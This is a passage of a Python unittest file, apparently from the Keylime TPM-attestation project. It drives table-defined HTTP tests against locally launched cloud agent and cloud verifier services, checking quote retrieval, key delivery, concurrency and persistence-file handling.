tpm_policy = json.loads(config.get('tenant', 'tpm_policy'))
my_cert = config.get('tenant', 'my_cert')
ca_cert = config.get('tenant', 'ca_cert')
private_key = config.get('tenant', 'private_key')
test_num_cloudagents = config.getint('general','test_num_cloudagents')
test_duration = config.getint('general','test_duration')
# cv_persistence_filename = config.get('cloud_verifier', 'persistence_filename')
# en_persistence_filename = config.get('registrar', 'persistence_filename')
cv_persistence_filename = None
en_persistence_filename = None
K = None
U = None
V = None
def readKUV():
global K, U, V
# read the keys in
f = open('content_keys.txt','r')
K = base64.b64decode(f.readline())
U = base64.b64decode(f.readline())
V = base64.b64decode(f.readline())
f.close()
def text_callback(request, context):
context.status_code = 402
return '{}'
class Test(unittest.TestCase):
cloudverifier_process = None
@classmethod
def setUpClass(cls):
cls.test_table = {
"test_cloudagent_tenant_get_nonce" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_nonce",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_request_path": "/v1/quotes/tenant",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_cloudagent_tenant_get_nonce"},
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudagent_tenant_get_quote" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_quote",
"http_request_verb":"POST",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_body": '{"encrypt_check": "K+oD4GfBMAdOFy94ZxTU2hB77tySSB75VVz2Zo4jN02txhNK2KiO5JhE1SRIUVASMZMW/VQUS9WgWdCUaJ+LOTWSuQ13alG4P4cLoamBr9c=","encrypted_key":"rBWIxK4i6zTl/M69Yyh2hmX+itDR9QCx4CIqmuRrEN3JAIUc2M+balr8gPD9r3Bs0OxYRC8/kcxBNo9Bsm93WZKwlmbZt2uVxhfaAqXwdGVpMBnM3bQnAEj1LIFoZZyQ48PVIdrEO4WW73Z2X3fplEFgOC3YT3lzluYgrn8iBkMRm+o2pJMdhynh6xLguszLX7qDOccPIIJch14ftWlsy6Ya9a6LHr9+hIfs4p2ATVVSl1wtUbf/ouNJdqUPAiFc4oXsg+kHQzWWiipjsAm871cA4wlvUb+/D4mFz1p3PRAK9hcICGwKoanWh8jbeuYnoqkch2EoHeLqayrisfNogg=="}',
"http_result_status_expected": 200,
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudverifier_tenant_provide_v" : {
#"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudverifier_tenant_provide_v",
#"pre_function" : {"name":"do_mock_for_test_cloudverifier_tenant_provide_v", "argument": None},
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
#"concurrent_instances" : 10,
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
},
"test_concurrent_access" : {
"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_concurrent_access",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"concurrency" : {"instances": 5, "new_thread_function":"new_thread"},
"test_iterations" : 100,
},
],
"state_validation_functions": [
{
"function_name": "test_agent_id_list",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
#"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_and_delete_all_entries", "argument": 500}
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_concurrent_cloudnodiness" : {
#"prerun_function" : {"name":"launch_cloudagents", "args": {'starting_port':9000, 'num_cloudagent_instances':250}},
"prerun_function" : {"name":"launch_cloudagents", "args": {'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents}},
"state_change_functions": [
{
"pre_function" : {"name":"test_concurrent_cloudnodiness_modify_request", "argument": 500},
"function_name": "test_concurrent_cloudnodiness",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C00000","cloudagent_ip":"cloudagent_ip.txt","cloudagent_port":"cloudagent_port.txt","tpm_policy": {"22":"ffffffffffffffffffffffffffffffffffffffff","16":"0000000000000000000000000000000000000000"} }',
"http_result_status_expected": 200,
"test_iterations" : test_num_cloudagents,
"post_function" : {"name":"test_concurrent_cloudnodiness_reset_request", "args": {"ip_file": "cloudagent_ip.txt","port_file":"cloudagent_port.txt"} },
},
],
"postrun_function" : {"name":"kill_cloudagents_after_delay", "args": {'sleep': test_duration, 'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents} },
},
"test_full_integration_happy_path" : {
#"prerun_function" : {"name":"launch_required_servers", "argument": None},
"state_change_functions": [
{
"function_name": "do_cloudagent_part",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_result_status_expected": 200,
"check_function" : {"name":"provide_e"},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
{
"function_name": "do_cloudverifier_part",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "XrNfEiODfu1fdXGtWbA+Wk02UhBxx1jTq7zhbC54ROA=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C866E9","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_sleep", "argument": 5},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
#"postrun_function" : {"name":"kill_required_servers", "argument": None},
},
"test_persistance_file_load" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{"06480EC4-6BF3-4F00-8323-FE6AE5868297": {"tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}, "ip": "127.0.0.1", "port": "8882", "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU="}}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_load",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_load", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_write" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_write",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_write", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_bad" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{'},
},
"test_persistance_file_empty" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": ''},
"state_change_functions": [
{
"function_name": "test_persistance_file_empty",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_nonexistent" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": None},
"state_change_functions": [
{
"function_name": "test_persistance_file_nonexistent",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
}
def test_concurrent_cloudnodiness(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_nonce(self):
self.execute_test_definition()
def test_cloudagent_tenant_get_quote(self):
self.execute_test_definition()
def test_cloudverifier_tenant_provide_v(self):
self.execute_test_definition()
def test_concurrent_access(self):
self.execute_test_definition()
def test_full_integration_happy_path(self):
self.execute_test_definition()
def test_persistance_file_load(self):
self.execute_test_definition()
def test_persistance_file_write(self):
self.execute_test_definition()
def test_persistance_file_bad(self):
self.execute_test_definition()
def test_persistance_file_empty(self):
self.execute_test_definition()
def test_persistance_file_nonexistent(self):
self.execute_test_definition()
def test_cloudagent_cloud_verifier_get_quote(self):
pass
def check_test_sleep(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
time.sleep(argument)
#'{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
def read_line_in_file(self, infile, line_number):
with open(infile) as fp:
for i, line in enumerate(fp):
if i == line_number:
return line
def sleep_for_a_while(self, argument):
time.sleep(float(argument))
def test_concurrent_cloudnodiness_modify_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
tmpp_policy = json_request_body['tpm_policy']
mask = 0
for key in list(tmpp_policy.keys()):
if key.isdigit() :
mask = mask + (1<<int(key))
mask_str = "0x%X"%(mask)
tmpp_policy['mask'] = mask_str
json_request_body['tpm_policy'] = tmpp_policy
cloudagent_ip = json_request_body['cloudagent_ip']
if cloudagent_ip.endswith('.txt'):
cloudagent_ip_file = cloudagent_ip
cloudagent_ip_read_from_file = self.read_line_in_file(cloudagent_ip_file, test_iteration)
json_request_body['cloudagent_ip'] = cloudagent_ip_read_from_file.strip()
cloudagent_port = json_request_body['cloudagent_port']
if cloudagent_port.endswith('.txt'):
cloudagent_port_file = cloudagent_port
cloudagent_port_read_from_file = self.read_line_in_file(cloudagent_port_file, test_iteration)
json_request_body['cloudagent_port'] = cloudagent_port_read_from_file.strip()
# parser = ConfigParser.RawConfigParser()
# parser.read(common.CONFIG_FILE)
# test_agent_uuid = parser.get('general', 'agent_uuid')
test_agent_uuid = json_request_body['agent_id']
port_string_length = len(str(json_request_body['cloudagent_port']))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(json_request_body['cloudagent_port'])
json_request_body['agent_id'] = contrived_uuid
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_concurrent_cloudnodiness_reset_request(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
#time.sleep(2)
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
request_body = test_functions.get("http_request_body")
try:
json_request_body = json.loads(request_body)
#reset the request body to file arguments for next iteration
json_request_body['cloudagent_ip'] = argument["ip_file"]
json_request_body['cloudagent_port'] = argument["port_file"]
test_functions['http_request_body'] = json.dumps(json_request_body)
except Exception as e:
self.fail("Problem in test_concurrent_cloudnodiness_modify_request() replacing cloudagent_ip or cloudagent_port. Error: %s"%e)
def test_check_persistance_file_empty(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
try:
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 0:
self.fail("Expected empty persistence file to replace non existent persistence file on startup.")
except Exception as e:
self.fail("Problem reading persistence file after replacement of empty persistence file. Error: %s"%e)
def check_test_persistance_file_write(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
try:
with open(cv_persistence_filename, "r") as persistance_file:
file_contents = persistance_file.read()
json_content = json.loads(file_contents)
if len(json_content) != 1 or json_content.get(uuid_str) is None:
self.fail("Unexpected persistence file contents.")
except Exception as e:
self.fail("Problem reading persistence file after POST. Error: %s"%e)
try:
with open(cv_persistence_filename + ".bak", "r") as backup_persistance_file:
backup_file_contents = backup_persistance_file.read()
json_backup_content = json.loads(backup_file_contents)
if len(json_backup_content) != 0:
self.fail("Unexpected backup persistence file contents.")
except Exception as e:
self.fail("Problem reading backup persistence file after POST. Error: %s"%e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None :
self.fail("Expected " + uuid_str + " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
response_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(response_body)
public_key = jsondecoded.get("pubkey")
quote = jsondecoded.get("quote")
# test to make sure these two keys (and values) are in the return
if public_key == None or quote == None:
self.fail("Expected both pubkey and quote arguments." )
else:
mytenant = tenant.Tenant()
# command line options can overwrite config values
mytenant.cloudagent_ip = cloudagent_ip
mytenant.cloudverifier_ip = cloudverifier_ip
mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
if mytenant.validate_tpm_quote(public_key, quote):
# encrypt U with the public key
global U, K
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key),str(U))
encrypt_check = crypto.do_hmac(K,mytenant.agent_uuid)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'encrypt_check': encrypt_check
}
u_json_message = json.dumps(data)
#post encrypted U back to Cloud Agent
response = tornado_requests.request("POST", "http://%s:%s/v1/quotes/tenant"%(cloudagent_ip,cloudagent_port),data=u_json_message)
if response.status_code != 200:
self.fail("Posting of Encrypted U to the Cloud Agent failed with response code %d" %response.status_code )
else:
self.fail("TPM Quote from cloud agent is invalid for nonce: %s"%self.nonce )
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if jsondecoded.get("pubkey") == None or jsondecoded.get("quote") == None:
self.fail("Expected both pubkey and quote arguments." )
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
v = jsondecoded.get("v")
ip = jsondecoded.get("ip")
port = jsondecoded.get("port")
tpm_policy = jsondecoded.get("tpm_policy")
if v is None or v != "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=":
self.fail("Returned v from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if ip is None or ip != "127.0.0.1":
self.fail("Returned ip from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if port is None or port != "8882":
self.fail("Returned port from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if tpm_policy is None or tpm_policy != {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}:
self.fail("Returned tpm_policy from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
agent_id_list = json.loads(target_body)
expected_len = argument
actual_len = len(agent_id_list)
if actual_len != expected_len:
self.fail("Expected " + str(expected_len) +" instance id's but received " + str(actual_len))
for agent_id in agent_id_list:
params = {
'agent_id': agent_id,
}
try:
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + agent_id + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + agent_id + " failed with exception: %s"%e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration ):
# call the pre_function
pre_function = test_functions.get("pre_function")
if pre_function is not None:
pre_function_name = pre_function.get('name')
pre_function_args = pre_function.get('args')
function_return = getattr(self, pre_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args) #self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted." )
full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
verb = test_functions.get("http_request_verb")
query = test_functions.get("http_request_query","")
test_functions.get("http_request_header")
req_header = test_functions.get("http_request_header")
response = tornado_requests.request(verb, full_url,
params=query,
data=thedata,
headers=req_header)
temp = tempfile.TemporaryFile()
for chunk in response.iter_content(1024):
temp.write(chunk)
temp.seek(0)
# copy the results for future checking
test_functions["http_result_status_actual"] = response.status_code
test_functions["http_result_header_actual"] = response.headers
test_functions["http_result_body_actual"] = temp.read()
#validate response status
if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"])) # reset the file marker for reading
#validate response headers
if test_functions.get("http_result_header_expected") is not None and not (all(item in list(response.headers.items()) for item in list(test_functions["http_result_header_expected"].items()))):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive expected headers.")
#validate (shallow) response body
if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
#validate (deep) response body
check_function = test_functions.get("check_function")
if check_function is not None:
check_argument = check_function.get("argument")
if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
# call the post_function
post_function = test_functions.get("post_function")
if post_function is not None:
post_function_name = post_function.get('name')
post_function_args = post_function.get('args')
function_return = getattr(self, post_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted." )
temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
try:
# Table data does not provide ability to inject unique agent_id's for each concurrent instance.
# The queue stores unique agent_id objects, injected by the new_thread function.
# Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
the_uid = queue.get()
jsondata = json.loads(thedata)
jsondata['agent_id'] = the_uid
newdata = json.dumps(jsondata)
# call the inline task passing the new data with the unique agent_id
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration )
except Exception as e:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", unexpected exception error: %s"%e )
finally:
queue.task_done()
def modify_persistence_file(self, argument):
string_to_write = None
if isinstance(argument, dict):
string_to_write = json.dumps(argument)
elif isinstance(argument, str):
string_to_write = argument
elif isinstance(argument, file):
string_to_write = argument.read()
argument.close()
elif argument is None:
if os.path.isfile(cv_persistence_filename):
os.remove(cv_persistence_filename)
if string_to_write is not None:
with open(cv_persistence_filename, "w") as persistance_file:
persistance_file.write(string_to_write)
backup_file_name = cv_persistence_filename + ".bak"
if os.path.isfile(backup_file_name):
os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
readKUV()
#modify the persistence file per the passed argument
if argument is not None:
string_to_write = self.modify_persistence_file(argument)
global cv_process
cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
time.sleep(1)
return True
def overwrite_config_file(self, path, section, option, value):
parser = configparser.RawConfigParser()
parser.read(path)
parser.set(section, option, value)
# Writing our configuration file to 'example.ini'
with open(path, 'wb') as configfile:
parser.write(configfile)
def launch_cloudagents(self, argument):
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
#shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', str(cloudagent_start_port))
port_string_length = len(str(cloudagent_start_port))
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + str(cloudagent_start_port)
self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_start_port = cloudagent_start_port + 1
#time.sleep(2)
self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
original_cloudagent_port = parser.get('general', 'cloudagent_port')
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
config_file_path = new_dir + "/keylime.conf"
copy_tree('.', new_dir)
shutil.copyfile(common.CONFIG_FILE, config_file_path)
if not os.path.isdir(new_dir):
os.mkdir(new_dir)
#shutil.copyfile(r'../keylime.conf', new_dir + r'/keylime.conf')
self.overwrite_config_file(config_file_path, 'general', 'cloudagent_port', cloudagent_port_read_from_file)
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
self.overwrite_config_file(config_file_path, 'general', 'agent_uuid', contrived_uuid)
cn_process_list.append(subprocess.Popen("python cloud_agent.py", shell=True, cwd=new_dir, preexec_fn=os.setsid).pid)
cloudagent_port = int(cloudagent_port_read_from_file) + 1
#time.sleep(2)
self.overwrite_config_file(common.CONFIG_FILE, 'general', 'cloudagent_port', str(original_cloudagent_port))
print("done creating cloud agents, waiting for them to start...")
time.sleep(10)
print("starting test...")
def kill_cloudagents_after_delay(self, argument):
sleep_time = argument.get('sleep')
time.sleep(sleep_time)
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
for cn in range(num_cloudagent_instances):
new_dir = r'../cloudagent_on_port_' + str(cloudagent_start_port)
shutil.rmtree(new_dir)
cloudagent_port = cloudagent_start_port + 1
elif port_file is not None:
parser = configparser.RawConfigParser()
parser.read(common.CONFIG_FILE)
test_agent_uuid = parser.get('general', 'agent_uuid')
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
port_string_length = len(cloudagent_port_read_from_file)
contrived_uuid = test_agent_uuid[:-port_string_length]
contrived_uuid = contrived_uuid + cloudagent_port_read_from_file
params = {
'agent_id': contrived_uuid,
}
try:
print(("Sending #" + str(cn) + " DELETE request to CV for uuid: " + contrived_uuid))
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + contrived_uuid + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + contrived_uuid + " failed with exception: %s"%e)
for cn in range(num_cloudagent_instances):
cloudagent_port_read_from_file = self.read_line_in_file(port_file, cn).strip()
new_dir = r'../cloudagent_on_port_' + cloudagent_port_read_from_file
shutil.rmtree(new_dir)
for the_pid in cn_process_list:
print(("killing pid" + str(the_pid)))
os.killpg(the_pid, signal.SIGTERM)
def kill_cloudverifier(self, argument):
cv_process.kill()
return True
def launch_cloudagent(self, argument):
readKUV()
global cn_process
cn_process = subprocess.Popen("python cloud_agent.py", shell=True)
time.sleep(1)
return True
def kill_cloudagent(self, argument):
cn_process.kill()
return True
def launch_required_servers(self, argument):
